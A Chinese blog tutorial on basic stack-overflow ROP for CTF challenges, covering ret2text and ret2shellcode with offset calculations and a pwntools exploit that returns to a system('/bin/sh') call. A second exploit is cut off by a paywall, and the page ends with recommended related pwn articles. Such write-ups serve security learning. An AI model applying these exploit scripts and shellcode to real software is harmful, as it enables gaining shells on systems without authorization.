栈溢出总结之基础ROP

最新推荐文章于 2024-12-08 16:10:35 发布
原创 最新推荐文章于 2024-12-08 16:10:35 发布 · 727 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

ret2text

原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。
这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。
例子
仅开了NX栈不可执行保护。
主函数:发现gets处有栈溢出漏洞
在这里插入图片描述
在这里插入图片描述
在secure()函数中发现system(“bin/sh”),我们如果可以控制程序返回到0x0804863A处就可以拿到shell了。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到ebp的地址为0xffffcf08,esp的地址为0xffffce80,参数s相对于esp的索引为[esp + 0x1c],所以s的地址为0xffffce9c,所以s到ebp的偏移量为0xffffcf08-0xffffce9c=108。相对于返回地址的偏移为108+4。
exp

from pwn import*
p=process('./ret2text')
elf=ELF('./ret2text')
p.recvuntil('\n')
payload='a'*0x6c+'aaaa'+p32(0x08048641)
p.sendline(payload)
p.interactive()

ret2shellcode

原理:ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。

在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。

例子:
32位程序,没有保护机制。
主程序:发现gets存在栈溢出漏洞,strncpy即将指定的字符串复制到buf2处。
在这里插入图片描述
发现buf2在bss段。
在这里插入图片描述
用vmmap命令发现bss段是可读可写可执行的。这时就可以把shellcode写到bss段拿到shell了。
在这里插入图片描述
ebp地址为0xffffcef8,esp地址为0xffffce70。参数s相对于esp的索引为[esp + 0x1c],所以s的地址为0xffffce8c,此时gets函数的偏移为0xffffcef8-0xffffce8c+4=112
在这里插入图片描述
在这里插入图片描述
需要说明的是,对于一般的shellcode来说,我们可以直接用pwnlibc中的语句shellcode=asm(shellcraft.sh())自动生成一串shellcode,当然也可以自己写shellcode。
pwnlibc官网:http://docs.pwntools.com/en/stable/about.html
exp:

from pwn import*
context.log_level='debug'
p=process('./ret2shellcode'
最低0.47元/天 解锁文章
使用ROP攻击利用栈溢出漏洞
panfengblog
04-12 1667
使用ROP攻击利用栈溢出漏洞 环境:ubuntu16.04, gcc, python2.7 说明:为了成功实现Return2LibC攻击,这里关闭了可执行栈、关闭了StackGuard、关闭了地址随机化,终极目标是执行 system("/bin/sh") ⭐️⭐️注意⭐️⭐️:这是承接上一篇文章使用Return2LibC利用栈溢出漏洞的,栈溢出漏洞程序和上一篇相同 1. 安装ROPgadget 对于ubuntu16.04,默认安装了python2,只需要安装pip即可,然后再安装ROPgadget依赖c
PWN栈溢出基础——ROP1.0
Gifoyle的博客
07-13 1052
PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇) 在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每一步操作写出来。 参考ctf-wiki以及其他资源,参考链接见最后,文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码(.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets
CTF-PWN笔记(一)-- 栈溢出基础ROP
CK_0ff的博客
01-09 5970
文章目录栈linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单的栈溢出(ret2txt)ret2shellcode 栈 栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存
二、栈溢出——基本ROP
最新发布
pyh1322712308的博客
12-08 631
栈溢出
栈溢出总结之中级ROP
weixin_45097188的博客
03-01 428
ret2csu 原理: (所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。) 在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多时候,我们很难找到每一个寄存器对应的gadgets。而这时我们就可以利用x64下的 __libc_csu_init中的gadgets。这个函数是用来对libc进行初始化操作的,而一般的程...
Android 栈溢出攻击—[3]ROP 浅析
杏林小轩
01-03 1592
在缓冲区溢出攻击攻防发展过程中ROP技术作为对抗XN的利用技术,一直发挥着重要的作用,在很多漏洞中其都是关键的攻击手段。本文通过一个简单的例子来对Android的ARM平台下ROP技术做一个简单的分析。
精选资源
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
总结来说,理解栈溢出的基本原理、保护机制以及利用方法对于提升系统的安全性至关重要。在开发过程中,应遵循良好的编程实践,避免栈溢出的发生,而在防御方面,了解攻击手段有助于设计更有效的防护策略。
PWN】03.Linux-User Mode-栈溢出-x86-基本ROP
weixin_52553215的博客
11-23 4444
检查保护:checksec 文件名 编译并关闭栈保护:gcc -no-pie -fno-stack-protector -z execstack -m32 -o read read.c 查看程序使用了哪些函数:objdump -t -j .test.read(推荐使用ida)
理解ROP攻击:栈溢出漏洞的利用
# 第一章:栈溢出攻击的基础知识 ## 1.1 漏洞的定义和原理 在计算机安全领域,漏洞是指软件或硬件中的一种错误或缺陷,可能被攻击者利用来执行恶意操作。栈溢出漏洞是其中最常见的一种漏洞类型之一。栈溢出漏洞...
高级栈溢出技术—ROP实战(badchars)
ChuMeng1999的博客
01-09 946
目录预备知识关于ROP本系列rop实战题目的背景badchars涉及知识点实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmpor
栈溢出攻击(2)-ROP基础(1)
helloworlddm的博客
08-01 1084
文章目录预备条件栈溢出ROPret2text程序攻击目标简单fuzz查看保护机制调试程序查看汇编代码确定与返回地址的偏移寻找获取系统shell的代码获取shellret2shellcode攻击目标简单fuzz查看保护机制调试程序确定与返回地址的偏移获取shellpython ljustshellcode获取shell的payloadexploit公众号 预备条件 ret2shellcode:http://www.hacksprit.top:8090/files/ret2shellcode ret2text:
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 6799
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
BUUCTF bjdctf_2020_babyrop
红叶的博客
10-27 877
今天终于搞明白 ret2libc3 了,不过不知道为什么所有 包括我自己写的PoC,都不能成功获取 ret2libc3 的shell,因此就去做BUUCTF的题了,边看大佬的解析边做。至此 system、/bin/sh 的地址就已经拿到了,只需要重新溢出一次程序,使用刚才获取的地址即可。因为没有开PIE,因此地址是固定的。使用 1 的 Libc 即可获取shellROPgadget找pop rdi。gdb动态调试查看需要覆盖的数量。打开IDA Pro看一眼。ret2libc的做法。首先checksec。
puts函数泄露地址
Sakura给爷pwn全场
12-17 1112
CTF中的PWN——绕CANARY防护3(选择项+PUTS带出CANARY+泄露函数地址计算基地址): https://www.freesion.com/article/5901691025/ 利用puts函数泄露libc内存信息: https://www.it610.com/article/1296102748638486528.htm
CTF中的PWN——绕canary防护3(puts带出canary 泄露函数地址计算基地址)
壊壊的诱惑你的博客
10-14 2711
前言: 想要学好pwn,首先要看懂wp。此题断断续续占用了我两三天,原谅我太菜了。此题为攻防世界的babystack。金丝雀前文叙述过,此处不再阐述,绕过的首选办法就是想办法得到canary的值,因为程序每次load的时候canary都不同,但是一个进程中的所有方法的金丝雀的值都相同。得到canry的值后构造payload即可。 题目:babystack-攻防世界 file及...
栈上格式化字符串漏洞总结
weixin_66751120的博客
02-04 3026
例如printf(s),这就是个漏洞函数,那么正确形式应该是printf('%s',s),即以字符串形式输出,那么存在漏洞的原因就是就是没有格式化字符,这时候如果我们在漏洞函数上边输入一个格式化字符,比如%p,那么就会泄露指定位置的地址。因为当程序进行printf函数时,第一个参数是格式化字符,来确定下面一个数据的打印形式。下面是一些格式化字符代表的意思。
PWN练习---Stack_1
qq_74259765的博客
06-25 1712
ctf--PWN方向一些做题经历wp
格式化字符串漏洞读书笔记
hl1293348082的专栏
04-06 191
复现蒸米师傅Memory Leak & DynELF失败,所以留个坑(惨) 预备知识 关于printf()可以参考 https://www.cnblogs.com/phinecos/archive/2007/08/24/868524.html 里面讲了简单的printf()实现。这里讲的除了x86-64里的pwn之外的都是32位。 printf( arg0, arg1,... )函数的参数是从右往左入栈,这样就弹出来的第一个参数就是最左边的参数(arg0)。而且参数的个数是不定的。他的
PWN-shellcode获取与编写
热门推荐
杀生丸?不,其实我要的是桔梗
03-16 1万+
当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。 而shellcode该怎么获得呢? 一、获取集成写好的 1.From pwntools (1)先设置目标机的参数 context(os=’linux’, arch=’amd64’, log_level=’debug’) 1. os设置系统为linux系统,在完成ctf题目的...
深入解析缓冲区溢出与ShellCode提取技术
本资源“详解缓冲区溢出-ShellCode提取等”从基础讲起,逐步深入,内容涵盖攻击原理、ShellCode构造、实战练习等多个方面,适合信息安全爱好者、渗透测试人员、安全研究人员深入学习。通过系统学习与实践,即使是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值